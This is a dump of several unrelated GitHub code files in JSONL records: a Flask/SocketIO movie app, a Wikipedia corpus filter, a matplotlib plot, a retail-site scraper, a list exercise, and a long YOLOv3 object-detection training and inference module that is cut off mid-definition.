Defaults to `None`.\n \"\"\"\n self.__output_config_registry[name] = ConfigRegistry()\n\n output_stream_config_schema = output_stream.get_config_schema()\n config_schema_dict = {}\n for config_schema in output_stream_config_schema:\n validate_type(\n config_schema,\n Config,\n \"config_schema must be an instance of Config\")\n config_schema_dict[config_schema.name] = config_schema\n self.__output_config_registry[name].set_value(\n config_schema.name, config_schema.default_value)\n self.__output_config_schema[name] = config_schema_dict\n\n if default_config is not None:\n for config_name, value in default_config.items():\n self.__validate_and_set_value_for_output_stream_config(\n name, config_name, value)\n\n def __validate_and_set_value_for_output_stream_config(\n self, name: str, config_name: str, value: Any) -> None:\n \"\"\"\n Validates and sets the value for an output stream config.\n\n # Arguments\n name: The name of the output stream.\n config_name: The name of the config.\n value: The value.\n \"\"\"\n config_schema_dict = self.__output_config_schema[name]\n if config_name not in config_schema_dict:\n return\n\n config_schema = config_schema_dict[config_name]\n if not config_schema.is_valid(value):\n raise ValueError(f\"Invalid value for config '{config_name}'\")\n\n self.__output_config_registry[name].set_value(config_name, value)\n self.__output_streams[name][\"stream\"].set_config_value(\n config_name, value)\n\n def __get_body(self):\n \"\"\"\n Gets the body.\n\n # Returns\n dict: The body.\n \"\"\"\n if isinstance(request.json, str):\n return json.loads(request.json)\n else:\n validate_type(request.json, dict, \"request body must be a JSON\")\n return request.json\n\n def __swagger(self) -> Response:\n \"\"\"\n Swagger.\n\n # Returns\n Response: The response.\n \"\"\"\n return render_template(\"swaggerui.html\", base_path=self.__path)\n\n def __specs(self) -> Response:\n \"\"\"\n OpenAPI 2.0 specs.\n\n # Returns\n Response: The response.\n \"\"\"\n return render_template(\"openapi.json\", base_path=self.__path)\n\n def __set_perception_completion_callback(\n self, perception_completion_callback: Callable[[PerceptionObjectModel], None] = None):\n \"\"\"\n Sets the perception completion callback.\n\n # Arguments\n perception_completion_callback: The perception completion callback.\n \"\"\"\n if perception_completion_callback is not None:\n validate(callable(perception_completion_callback),\n \"perception_completion_callback must be a function\")\n\n self.__perception_completion_callback = perception_completion_callback\n\n def __kill(self, code, _) -> None:\n sys.exit(code)\n\n\nclass CustomJSONEncoder(JSONEncoder):\n \"\"\"\n Custom JSON encoder.\n \"\"\"\n\n def default(self, o):\n \"\"\"\n Default.\n\n # Arguments\n o: The object.\n\n # Returns\n Any: The result.\n \"\"\"\n if isinstance(o, RGB):\n return o.to_hex()\n else:\n return super().default(o)\n","repo_name":"darcyai/darcyai","sub_path":"src/darcyai/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":73036,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"15737835040","text":"from utilities.data_management import make_path\nfrom os import rename\nfrom multiprocessing import Pool\nfrom itertools import compress\nfrom pandas import DataFrame\nimport config\n\n\ndef long_enough(document, threshold=10):\n n_words = len(document.split(' '))\n\n return n_words >= threshold\n\n\nif __name__ == '__main__':\n directory = make_path('data/datasets/wikipedia_corpus')\n file_path = directory / 'wikipedia_corpus.csv'\n backup_path = directory / 'wikipedia_corpus_backup.csv'\n\n if not (file_path.exists() or backup_path.exists()):\n raise FileNotFoundError('File doesn\\'t exist.')\n if not backup_path.exists():\n print('Backing up.')\n rename(file_path, backup_path)\n print('Config done.')\n\n with backup_path.open(encoding='utf-8') as fl:\n content = fl.readlines()\n print('Content loaded')\n\n n_thread = config.n_threads\n pool = Pool(n_thread)\n\n non_header_mask = pool.map(long_enough, content)\n\n pool.close()\n pool.join()\n print('Computed mask')\n\n content = list(compress(content, non_header_mask))\n content = DataFrame(content, columns=['document_content'])\n print('Converted to DataFrame.')\n\n content.to_csv(file_path, encoding='utf-8')\n\n # index = 0\n # with file_path.open('w', encoding='utf-8') as fl:\n # for document in compress(content, non_header_mask):\n # fl.write(str(index) + ',' + document)\n # index += 1\n\n print('Done.')\n","repo_name":"simonsben/intent_detection","sub_path":"data/preparation/wikipedia_corpus.py","file_name":"wikipedia_corpus.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23733682501","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 10 10:45:59 2018\n\nplotting taken from \" Introduction to python for Engineers\" By Sandeep Nagar, Apress\n\n@author: SIDHARTH\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import pylab as pl\n\npl.figure(figsize=(9,7), dpi=100)\npl.subplot(1,1,1)\nX = np.linspace(-np.pi*2, np.pi*2,10e4,endpoint=True)\nS , S2 = np.sin(X), np.cos(X)\npl.plot(X,S,color =\"blue\", linewidth=1.0,linestyle=\"-\",label=\"$sin(x)$\")\npl.plot(X,S2,color=\"red\", linewidth=1.5,linestyle=\"--\",label=\"$sin(2x)$\")\npl.xlim(-2*np.pi,2.5*np.pi)\npl.xticks(np.linspace(-2.5*np.pi,2.5*np.pi,9,endpoint=True))\npl.ylim(-1.2,1,2)\npl.yticks(np.linspace(-1,1,5,endpoint=True))\npl.title('$sin(x)$ and $cos(x)$ waves')\npl.ylabel('$sin(x)$ and $cos(x)$')\npl.xlabel('$x$')\npl.grid(True)\npl.legend()\npl.show()\n","repo_name":"sidhu177/DataSci","sub_path":"Plot1.py","file_name":"Plot1.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"26210666748","text":"from flask import *\r\nimport flask_socketio\r\nimport os\r\nfrom sockets import comment\r\nfrom flask_sqlalchemy import SQLAlchemy\r\n\r\n\r\napp = Flask(__name__)\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:123456@127.0.0.1:3306/' \\\r\n 'moviedata?charset=utf8mb4'\r\napp.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\r\napp.config['SECRET_KEY'] = '123456'\r\n\r\ndb = SQLAlchemy(app)\r\n\r\n\r\nfrom blueprints import play, users\r\napp.register_blueprint(play.bp)\r\napp.register_blueprint(users.user)\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n return redirect(url_for(\"user.login\"))\r\n\r\n\r\n# socketio = flask_socketio.SocketIO(app)\r\nsocketio = flask_socketio.SocketIO(app, cors_allowed_origins=\"*\")\r\ncomment.register_comment(socketio)\r\n\r\nif __name__ == '__main__':\r\n # app.run(host='0.0.0.0', port=80, debug=True, threaded='True')\r\n socketio.run(app, host='0.0.0.0', port=5000, debug=True)\r\n\r\n","repo_name":"952079739/Vision","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5756390861","text":"import asyncio\nfrom requests_html import AsyncHTMLSession\n\n\nclass TravisPerkinsScraper:\n def __init__(self):\n self.session = AsyncHTMLSession()\n\n async def scrape_products_from_url(self, url):\n response = await self.session.get(url)\n await response.html.arender()\n print(f\"Response code: {response.status_code}\")\n\n blob = []\n categories = response.html.find('div[data-test-id=\"category-wrapper\"]')\n for category in categories:\n title = category.find(\"h6\", first=True).text.strip()\n img_url = category.find(\"img\", first=True).attrs[\"src\"][2:]\n blob.append({\"title\": title, \"url\": img_url})\n # print(f\"Category Name: {title}\\nImage URL: {img_url}\\n\")\n return blob\n\n async def scrape_categories(self):\n url = f\"https://www.travisperkins.co.uk/product/c/1000000/\"\n return await self.scrape_products_from_url(url)\n\n async def scrape_building_materials(self):\n url = f\"https://www.travisperkins.co.uk/product/building-materials/c/1500029/\"\n return await self.scrape_products_from_url(url)\n\n async def scrape_timber_materials(self):\n url = f\"https://www.travisperkins.co.uk/product/timber-and-sheet-materials/c/1500000/\"\n return await self.scrape_products_from_url(url)\n\n async def scrape_decorating_materials(self):\n url = f\"https://www.travisperkins.co.uk/product/decorating-and-interiors/c/1500538/\"\n return await self.scrape_products_from_url(url)\n\n async def scrape_products_by_category(self, category: object) -> object:\n if category == \"Building Materials\":\n return await self.scrape_building_materials()\n if category == \"Timber & Sheet Materials\":\n return await self.scrape_timber_materials()\n if category == \"Decorating & Interiors\":\n return await self.scrape_decorating_materials()\n else:\n error = f\"No handler found for the category: {category}\"\n print(error)\n return error\n\n\nasync def main():\n # Wrap instance in async function to call it\n instance = TravisPerkinsScraper()\n data_one = await instance.scrape_decorating_materials()\n data_two = await instance.scrape_products_by_category(\"Decorating & Interiors\")\n\n print(data_one)\n print(data_two)\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n","repo_name":"EdAncerys/FastAPI","sub_path":"scrapers/travis_perkins.py","file_name":"travis_perkins.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"106207350","text":"response = input(\"what fruit will be added? > \")\n\nfruit_id_input = int(input(\"what's fruit ID?\"))\n\nadd_fruit_pos0 = input(\"What's fruit will be added in position 0?\")\nid_number = fruit_id_input -1\nfruit_list = [\"Apples\", \"Pears\",\"Oranges\",\"Peaches\"]\nfruit_list.append(response)\nprint(fruit_list)\nprint(fruit_list[id_number])\nadd_fruit_pos0 =[add_fruit_pos0,]\nadd_fruit_pos0_list = add_fruit_pos0 + fruit_list[:]\nprint(\"new fruit list after adding new fruit at pos 0:\", add_fruit_pos0_list)\nfruit_list.insert(0,add_fruit_pos0[0])\nprint(\"new list using 'insert': \", fruit_list)\nP_fruit_list = []\nfor i in fruit_list:\n if i[0] == \"P\":\n P_fruit_list.append(i)\n\nprint(\"fruit start with 'P': \", P_fruit_list)\n\ndL = fruit_list[:-2]\nprint(dL)\nnewList = fruit_list*2\nprint(\"double list: \",newList)\n#print(\"length of newList: \", len(newList))\n\nupdated_list = []\nm = 0\n\ndef remove_fruit(deleted_fruit, newList, updated_list):\n n =0\n for i in newList:\n if i == deleted_fruit:\n for j in newList:\n if j != deleted_fruit:\n updated_list.append(j)\n else:\n pass\n n = n+1\n break\n\n return updated_list, n\n\nwhile m<1:\n\n if m ==0:\n deleted_fruit = input(\"What fruit do you want to remove? \")\n if deleted_fruit == \"\":\n break\n updated_list, n =remove_fruit(deleted_fruit, newList, updated_list)\n m = n\nprint(\"this updated_list: \", updated_list)\n#print(\"length of updated_list: \", len(updated_list))\n","repo_name":"UWPCE-PythonCert-ClassRepos/SP_Online_PY210","sub_path":"students/anbaopham/Lesson 3/lesson_3_serries_1_2.py","file_name":"lesson_3_serries_1_2.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"44574651060","text":"import time, warnings\r\nimport os\r\nimport copy\r\nimport re\r\nimport json\r\nfrom typing import List, Tuple, Union, Optional, BinaryIO,Dict\r\nfrom PIL import Image, ImageColor, ImageDraw, ImageFont\r\nimport numpy as np\r\nimport traceback\r\nfrom pathlib import Path\r\nimport math\r\nimport torch\r\n\r\nfrom collections import defaultdict\r\nimport torchvision\r\nfrom enum import Enum\r\nimport uuid\r\nimport torch.nn as nn\r\nfrom torchvision.io import ImageReadMode\r\nfrom torch.optim import lr_scheduler\r\nfrom torchvision import datasets\r\nfrom torch.utils.data import Dataset\r\nfrom torchvision.ops import box_iou\r\nfrom torch.optim import SGD\r\nfrom torchvision import transforms\r\nfrom torch.cuda import amp\r\nfrom torch.utils.data import DataLoader\r\nfrom scipy.cluster.vq import kmeans\r\nimport random\r\nimport torch.nn.functional as F\r\nimport validate\r\nfrom torchvision.models import mobilenet_v2, inception_v3, resnet50, densenet121\r\nfrom torchvision.models.inception import InceptionOutputs\r\n\r\nfrom tqdm import tqdm\r\nimport cv2 as cv\r\n\r\n\r\nclass DetectionModelTrainer:\r\n\r\n def __init__(self) -> None:\r\n self.__device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__cuda = (self.__device != \"cpu\")\r\n self.__model_type = \"\"\r\n self.__model = None\r\n self.__optimizer = None\r\n self.__data_dir = \"\"\r\n self.__classes: List[str] = None\r\n self.__num_classes = None\r\n self.__anchors = None\r\n self.__dataset_name = None\r\n self.__mini_batch_size: int = None\r\n self.__scaler = amp.GradScaler(enabled=self.__cuda)\r\n self.__lr_lambda = None\r\n self.__custom_train_dataset = None\r\n self.__custom_val_dataset = None\r\n self.__train_loader = None\r\n self.__val_loader = None\r\n\r\n self.__model_path: str = None\r\n self.__epochs: int = None\r\n self.__output_models_dir: str = None\r\n self.__output_json_dir: str = None\r\n\r\n def __set_training_param(self, epochs: int, accumulate: int) -> None:\r\n \r\n self.__lr_lambda = lambda x: (1 - x / (epochs - 1)) * (1.0 - 0.01) + 0.01\r\n self.__anchors = generate_anchors(\r\n self.__custom_train_dataset,\r\n n=9 if self.__model_type == \"yolov3\" else 6\r\n )\r\n self.__anchors = [round(i) for i in self.__anchors.reshape(-1).tolist()]\r\n if self.__model_type == \"yolov3\":\r\n self.__model = YoloV3(\r\n num_classes=self.__num_classes,\r\n anchors=self.__anchors,\r\n device=self.__device\r\n )\r\n elif self.__model_type == \"tiny-yolov3\":\r\n self.__model = YoloV3Tiny(\r\n num_classes=self.__num_classes,\r\n anchors=self.__anchors,\r\n device=self.__device\r\n )\r\n if self.__model_path:\r\n self.__load_model()\r\n\r\n w_d = (5e-4) * (self.__mini_batch_size * accumulate / 64) \r\n g0, g1, g2 = [], [], [] \r\n for m in self.__model.modules():\r\n if hasattr(m, 'bias') and isinstance(m.bias, torch.nn.Parameter): \r\n g2.append(m.bias)\r\n if isinstance(m, torch.nn.BatchNorm2d): \r\n g0.append(m.weight)\r\n elif hasattr(m, 'weight') and isinstance(m.weight, torch.nn.Parameter): \r\n g1.append(m.weight)\r\n\r\n self.__optimizer = SGD(\r\n g0,\r\n lr=1e-2,\r\n momentum=0.6,\r\n\r\n nesterov=True\r\n )\r\n self.__optimizer.add_param_group({'params': g1, 'weight_decay': w_d}) \r\n self.__optimizer.add_param_group({'params': g2}) \r\n self.__lr_scheduler = lr_scheduler.LambdaLR(\r\n self.__optimizer,\r\n lr_lambda=self.__lr_lambda\r\n )\r\n del g0, g1, g2\r\n self.__model.to(self.__device)\r\n\r\n def __load_model(self) -> None:\r\n try:\r\n state_dict = torch.load(self.__model_path, map_location=self.__device)\r\n\r\n new_state_dict = {k: v for k, v in state_dict.items() if\r\n k in self.__model.state_dict().keys() and v.shape == self.__model.state_dict()[k].shape}\r\n self.__model.load_state_dict(new_state_dict, strict=False)\r\n except Exception as e:\r\n print(\"pretrained weight loading failed. Defaulting to using random weight.\")\r\n\r\n print(\"=\" * 20)\r\n print(\"Pretrained YOLOv3 model loaded to initialize weights\")\r\n print(\"=\" * 20)\r\n\r\n def __load_data(self) -> None:\r\n self.__num_classes = len(self.__classes)\r\n self.__dataset_name = os.path.basename(os.path.dirname(self.__data_dir + os.path.sep))\r\n self.__custom_train_dataset = LoadImagesAndLabels(self.__data_dir, train=True)\r\n self.__custom_val_dataset = LoadImagesAndLabels(self.__data_dir, train=False)\r\n self.__train_loader = DataLoader(\r\n self.__custom_train_dataset, batch_size=self.__mini_batch_size,\r\n shuffle=True,\r\n collate_fn=self.__custom_train_dataset.collate_fn\r\n )\r\n self.__val_loader = DataLoader(\r\n self.__custom_val_dataset, batch_size=self.__mini_batch_size // 2,\r\n shuffle=True, collate_fn=self.__custom_val_dataset.collate_fn\r\n )\r\n\r\n def setModelTypeAsYOLOv3(self) -> None:\r\n self.__model_type = \"yolov3\"\r\n\r\n def setModelTypeAsTinyYOLOv3(self) -> None:\r\n \r\n self.__model_type = \"tiny-yolov3\"\r\n\r\n def setDataDirectory(self, data_directory: str):\r\n\r\n if os.path.isdir(data_directory):\r\n self.__data_dir = data_directory\r\n else:\r\n raise ValueError(\r\n \"The parameter passed should point to a valid directory\"\r\n )\r\n\r\n def setTrainConfig(self, object_names_array: List[str], batch_size: int = 4, num_experiments=100,\r\n train_from_pretrained_model: str = None):\r\n self.__model_path = train_from_pretrained_model\r\n if self.__model_path:\r\n extension_check(self.__model_path)\r\n self.__classes = object_names_array\r\n self.__mini_batch_size = batch_size\r\n self.__epochs = num_experiments\r\n self.__output_models_dir = os.path.join(self.__data_dir, \"models\")\r\n self.__output_json_dir = os.path.join(self.__data_dir, \"json\")\r\n\r\n def trainModel(self) -> None:\r\n self.__load_data()\r\n os.makedirs(self.__output_models_dir, exist_ok=True)\r\n os.makedirs(self.__output_json_dir, exist_ok=True)\r\n\r\n mp, mr, map50, map50_95, best_fitness = 0, 0, 0, 0, 0.0\r\n nbs = 64\r\n nb = len(self.__train_loader)\r\n nw = max(3 * nb, 1000)\r\n last_opt_step = -1\r\n prev_save_name, recent_save_name = \"\", \"\"\r\n\r\n accumulate = max(round(nbs / self.__mini_batch_size), 1)\r\n\r\n self.__set_training_param(self.__epochs, accumulate)\r\n\r\n with open(os.path.join(self.__output_json_dir,\r\n f\"{self.__dataset_name}_{self.__model_type}_detection_config.json\"),\r\n \"w\") as configWriter:\r\n json.dump(\r\n {\r\n \"labels\": self.__classes,\r\n \"anchors\": self.__anchors\r\n },\r\n configWriter\r\n )\r\n\r\n since = time.time()\r\n\r\n self.__lr_scheduler.last_epoch = -1\r\n\r\n for epoch in range(1, self.__epochs + 1):\r\n self.__optimizer.zero_grad()\r\n mloss = torch.zeros(3, device=self.__device)\r\n print(f\"Epoch {epoch}/{self.__epochs}\", \"-\" * 10, sep=\"\\n\")\r\n\r\n for phase in [\"train\", \"validation\"]:\r\n if phase == \"train\":\r\n self.__model.train()\r\n print(\"Train: \")\r\n for batch_i, (data, anns) in tqdm(enumerate(self.__train_loader)):\r\n batches_done = batch_i + nb * epoch\r\n\r\n data = data.to(self.__device)\r\n anns = anns.to(self.__device)\r\n\r\n\r\n if batches_done <= nw:\r\n xi = [0, nw]\r\n accumulate = max(1, np.interp(batches_done, xi, [1, nbs / self.__mini_batch_size]).round())\r\n for j, x in enumerate(self.__optimizer.param_groups):\r\n\r\n x['lr'] = np.interp(batches_done, xi,\r\n [0.1 if j == 2 else 0.0, 0.01 * self.__lr_lambda(epoch)])\r\n if 'momentum' in x:\r\n x['momentum'] = np.interp(batches_done, xi, [0.8, 0.9])\r\n\r\n with amp.autocast(enabled=self.__cuda):\r\n _ = self.__model(data)\r\n loss_layers = self.__model.get_loss_layers()\r\n loss, loss_components = compute_loss(loss_layers, anns.detach(), self.__device)\r\n\r\n self.__scaler.scale(loss).backward()\r\n mloss = (mloss * batch_i + loss_components) / (batch_i + 1)\r\n\r\n \r\n if batches_done - last_opt_step >= accumulate:\r\n self.__scaler.step(self.__optimizer) \r\n self.__scaler.update()\r\n self.__optimizer.zero_grad()\r\n last_opt_step = batches_done\r\n\r\n print(\r\n f\" box loss-> {float(mloss[0]):.5f}, object loss-> {float(mloss[1]):.5f}, class loss-> {float(mloss[2]):.5f}\")\r\n\r\n self.__lr_scheduler.step()\r\n\r\n else:\r\n self.__model.eval()\r\n print(\"Validation:\")\r\n\r\n mp, mr, map50, map50_95 = validate.run(\r\n self.__model, self.__val_loader,\r\n self.__num_classes, device=self.__device\r\n )\r\n\r\n print(\r\n f\" recall: {mr:0.6f} precision: {mp:0.6f} mAP@0.5: {map50:0.6f}, mAP@0.5-0.95: {map50_95:0.6f}\" \"\\n\")\r\n\r\n if map50 > best_fitness:\r\n best_fitness = map50\r\n recent_save_name = self.__model_type + f\"_{self.__dataset_name}_mAP-{best_fitness:0.5f}_epoch-{epoch}.pt\"\r\n if prev_save_name:\r\n os.remove(os.path.join(self.__output_models_dir, prev_save_name))\r\n torch.save(\r\n self.__model.state_dict(),\r\n os.path.join(self.__output_models_dir, recent_save_name)\r\n )\r\n prev_save_name = recent_save_name\r\n\r\n if epoch == self.__epochs:\r\n torch.save(\r\n self.__model.state_dict(),\r\n os.path.join(self.__output_models_dir, self.__model_type + f\"_{self.__dataset_name}_last.pt\")\r\n )\r\n\r\n elapsed_time = time.time() - since\r\n print(f\"Training completed in {elapsed_time // 60:.0f}m {elapsed_time % 60:.0f}s\")\r\n torch.cuda.empty_cache()\r\n\r\n\r\nclass CustomObjectDetection:\r\n\r\n def __init__(self) -> None:\r\n self.__device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__anchors: List[int] = None\r\n self.__classes: List[str] = None\r\n self.__model = None\r\n self.__model_loaded: bool = False\r\n self.__model_path: str = None\r\n self.__json_path: str = None\r\n self.__model_type: str = None\r\n self.__nms_score = 0.4\r\n self.__objectness_score = 0.4\r\n\r\n def setModelTypeAsYOLOv3(self) -> None:\r\n self.__model_type = \"yolov3\"\r\n\r\n def setModelTypeAsTinyYOLOv3(self) -> None:\r\n self.__model_type = \"tiny-yolov3\"\r\n\r\n def setModelPath(self, model_path: str):\r\n if os.path.isfile(model_path):\r\n extension_check(model_path)\r\n self.__model_path = model_path\r\n self.__model_loaded = False\r\n else:\r\n raise ValueError(\r\n \"invalid path, path not pointing to the weightfile.\"\r\n ) from None\r\n self.__model_path = model_path\r\n\r\n def setJsonPath(self, configuration_json: str):\r\n self.__json_path = configuration_json\r\n\r\n def __load_classes_and_anchors(self) -> List[str]:\r\n\r\n with open(self.__json_path) as f:\r\n json_config = json.load(f)\r\n self.__anchors = json_config[\"anchors\"]\r\n self.__classes = json_config[\"labels\"]\r\n\r\n def __load_image_yolo(self, input_image: Union[str, np.ndarray, Image.Image]) -> Tuple[\r\n List[str], List[np.ndarray], torch.Tensor, torch.Tensor]:\r\n\r\n allowed_exts = [\"jpg\", \"jpeg\", \"png\"]\r\n fnames = []\r\n original_dims = []\r\n inputs = []\r\n original_imgs = []\r\n if type(input_image) == str:\r\n if os.path.isfile(input_image):\r\n if input_image.rsplit('.')[-1].lower() in allowed_exts:\r\n img = cv.imread(input_image)\r\n else:\r\n raise ValueError(f\"image path '{input_image}' is not found or a valid file\")\r\n elif type(input_image) == np.ndarray:\r\n img = input_image\r\n elif \"PIL\" in str(type(input_image)):\r\n img = np.asarray(input_image)\r\n else:\r\n raise ValueError(f\"Invalid image input format\")\r\n\r\n img_h, img_w, _ = img.shape\r\n\r\n original_imgs.append(np.array(cv.cvtColor(img, cv.COLOR_BGR2RGB)).astype(np.uint8))\r\n original_dims.append((img_w, img_h))\r\n if type(input_image) == str:\r\n fnames.append(os.path.basename(input_image))\r\n else:\r\n fnames.append(\"\")\r\n inputs.append(prepare_image(img, (416, 416)))\r\n\r\n if original_dims:\r\n return (\r\n fnames,\r\n original_imgs,\r\n torch.FloatTensor(original_dims).repeat(1, 2).to(self.__device),\r\n torch.cat(inputs, 0).to(self.__device)\r\n )\r\n raise RuntimeError(\r\n f\"Error loading image.\"\r\n \"\\nEnsure the file is a valid image,\"\r\n \" allowed file extensions are .jpg, .jpeg, .png\"\r\n )\r\n\r\n def useCPU(self):\r\n self.__device = \"cpu\"\r\n if self.__model_loaded:\r\n self.__model_loaded = False\r\n self.loadModel()\r\n\r\n def loadModel(self) -> None:\r\n\r\n self.__load_classes_and_anchors()\r\n\r\n if self.__model_type == \"yolov3\":\r\n self.__model = YoloV3(\r\n anchors=self.__anchors,\r\n num_classes=len(self.__classes),\r\n device=self.__device\r\n )\r\n elif self.__model_type == \"tiny-yolov3\":\r\n self.__model = YoloV3Tiny(\r\n anchors=self.__anchors,\r\n num_classes=len(self.__classes),\r\n device=self.__device\r\n )\r\n else:\r\n raise ValueError(\r\n f\"Invalid model type. Call setModelTypeAsYOLOv3() or setModelTypeAsTinyYOLOv3() to set a model type before loading the model\")\r\n\r\n self.__model.to(self.__device)\r\n\r\n state_dict = torch.load(self.__model_path, map_location=self.__device)\r\n try:\r\n self.__model.load_state_dict(state_dict)\r\n self.__model_loaded = True\r\n self.__model.to(self.__device).eval()\r\n except Exception as e:\r\n raise RuntimeError(f\"Invalid weights!!! {e}\")\r\n\r\n def detectObjectsFromImage(self,\r\n input_image: Union[str, np.ndarray, Image.Image],\r\n output_image_path: str = None,\r\n output_type: str = \"file\",\r\n extract_detected_objects: bool = False, minimum_percentage_probability: int = 40,\r\n display_percentage_probability: bool = True, display_object_name: bool = True,\r\n display_box: bool = True,\r\n custom_objects: List = None,\r\n nms_treshold: float = 0.4,\r\n objectness_treshold: float = 0.4,\r\n ) -> Union[\r\n List[List[Tuple[str, float, Dict[str, int]]]], np.ndarray, List[np.ndarray], List[str]]:\r\n\r\n self.__nms_score = nms_treshold\r\n self.__objectness_score = objectness_treshold\r\n\r\n self.__model.eval()\r\n if not self.__model_loaded:\r\n if self.__model_path:\r\n warnings.warn(\r\n \"Model path has changed but pretrained weights in the\"\r\n \" new path is yet to be loaded.\",\r\n ResourceWarning\r\n )\r\n else:\r\n raise RuntimeError(\r\n \"Model path isn't set, pretrained weights aren't used.\"\r\n )\r\n\r\n predictions = defaultdict(lambda: [])\r\n\r\n if self.__model_type == \"yolov3\" or self.__model_type == \"tiny-yolov3\":\r\n fnames, original_imgs, input_dims, imgs = self.__load_image_yolo(input_image)\r\n\r\n with torch.no_grad():\r\n output = self.__model(imgs)\r\n\r\n output = get_predictions(\r\n pred=output.to(self.__device), num_classes=len(self.__classes),\r\n nms_confidence_level=self.__nms_score, objectness_confidence=self.__objectness_score,\r\n device=self.__device\r\n )\r\n\r\n if output is None:\r\n if output_type == \"array\":\r\n if extract_detected_objects:\r\n return original_imgs[0], [], []\r\n else:\r\n return original_imgs[0], []\r\n else:\r\n if extract_detected_objects:\r\n return original_imgs[0], []\r\n else:\r\n return []\r\n\r\n\r\n input_dims = torch.index_select(input_dims, 0, output[:, 0].long())\r\n scaling_factor = torch.min(416 / input_dims, 1)[0].view(-1, 1)\r\n output[:, [1, 3]] -= (416 - (scaling_factor * input_dims[:, 0].view(-1, 1))) / 2\r\n output[:, [2, 4]] -= (416 - (scaling_factor * input_dims[:, 1].view(-1, 1))) / 2\r\n output[:, 1:5] /= scaling_factor\r\n\r\n\r\n for idx in range(output.shape[0]):\r\n output[idx, [1, 3]] = torch.clamp(output[idx, [1, 3]], 0.0, input_dims[idx, 0])\r\n output[idx, [2, 4]] = torch.clamp(output[idx, [2, 4]], 0.0, input_dims[idx, 1])\r\n\r\n for pred in output:\r\n pred_label = self.__classes[int(pred[-1])]\r\n if custom_objects:\r\n if pred_label.replace(\" \", \"_\") in custom_objects.keys():\r\n if not custom_objects[pred_label.replace(\" \", \"_\")]:\r\n continue\r\n else:\r\n continue\r\n predictions[int(pred[0])].append((\r\n pred_label,\r\n float(pred[-2]),\r\n {k: v for k, v in zip([\"x1\", \"y1\", \"x2\", \"y2\"], map(int, pred[1:5]))},\r\n ))\r\n\r\n\r\n original_input_image = None\r\n output_image_array = None\r\n extracted_objects = []\r\n\r\n if self.__model_type == \"yolov3\" or self.__model_type == \"tiny-yolov3\":\r\n original_input_image = cv.cvtColor(original_imgs[0], cv.COLOR_RGB2BGR)\r\n if isinstance(output, torch.Tensor):\r\n for pred in output:\r\n percentage_conf = round(float(pred[-2]) * 100, 2)\r\n if percentage_conf < minimum_percentage_probability:\r\n continue\r\n\r\n displayed_label = \"\"\r\n if display_object_name:\r\n displayed_label = f\"{self.__classes[int(pred[-1].item())]} : \"\r\n if display_percentage_probability:\r\n displayed_label += f\" {percentage_conf}%\"\r\n\r\n original_imgs[int(pred[0].item())] = draw_bbox_and_label(pred[1:5].int() if display_box else None,\r\n displayed_label,\r\n original_imgs[int(pred[0].item())]\r\n )\r\n output_image_array = cv.cvtColor(original_imgs[0], cv.COLOR_RGB2BGR)\r\n\r\n\r\n predictions_batch = list(predictions.values())\r\n predictions_list = predictions_batch[0] if len(predictions_batch) > 0 else []\r\n min_probability = minimum_percentage_probability / 100\r\n\r\n if output_type == \"file\":\r\n if output_image_path:\r\n cv.imwrite(output_image_path, output_image_array)\r\n\r\n if extract_detected_objects:\r\n extraction_dir = \".\".join(output_image_path.split(\".\")[:-1]) + \"-extracted\"\r\n os.mkdir(extraction_dir)\r\n count = 0\r\n for obj_prediction in predictions_list:\r\n if obj_prediction[1] >= min_probability:\r\n count += 1\r\n extracted_path = os.path.join(\r\n extraction_dir,\r\n \".\".join(os.path.basename(output_image_path).split(\".\")[:-1]) + f\"-{count}.jpg\"\r\n )\r\n obj_bbox = obj_prediction[2]\r\n cv.imwrite(extracted_path, original_input_image[obj_bbox[\"y1\"]: obj_bbox[\"y2\"],\r\n obj_bbox[\"x1\"]: obj_bbox[\"x2\"]])\r\n\r\n extracted_objects.append(extracted_path)\r\n\r\n elif output_type == \"array\":\r\n if extract_detected_objects:\r\n for obj_prediction in predictions_list:\r\n if obj_prediction[1] >= min_probability:\r\n obj_bbox = obj_prediction[2]\r\n\r\n extracted_objects.append(\r\n original_input_image[obj_bbox[\"y1\"]: obj_bbox[\"y2\"], obj_bbox[\"x1\"]: obj_bbox[\"x2\"]])\r\n else:\r\n raise ValueError(f\"Invalid output_type '{output_type}'. Supported values are 'file' and 'array' \")\r\n\r\n predictions_list = [\r\n {\r\n \"name\": prediction[0], \"percentage_probability\": round(prediction[1] * 100, 2),\r\n \"box_points\": [prediction[2][\"x1\"], prediction[2][\"y1\"], prediction[2][\"x2\"], prediction[2][\"y2\"]]\r\n } for prediction in predictions_list if prediction[1] >= min_probability\r\n ]\r\n\r\n if output_type == \"array\":\r\n if extract_detected_objects:\r\n return output_image_array, predictions_list, extracted_objects\r\n else:\r\n return output_image_array, predictions_list\r\n else:\r\n if extract_detected_objects:\r\n return predictions_list, extracted_objects\r\n else:\r\n return predictions_list\r\n\r\n\r\nclass CustomVideoObjectDetection:\r\n\r\n def __init__(self):\r\n self.__detector = CustomObjectDetection()\r\n\r\n def setModelTypeAsYOLOv3(self):\r\n self.__detector.setModelTypeAsYOLOv3()\r\n\r\n def 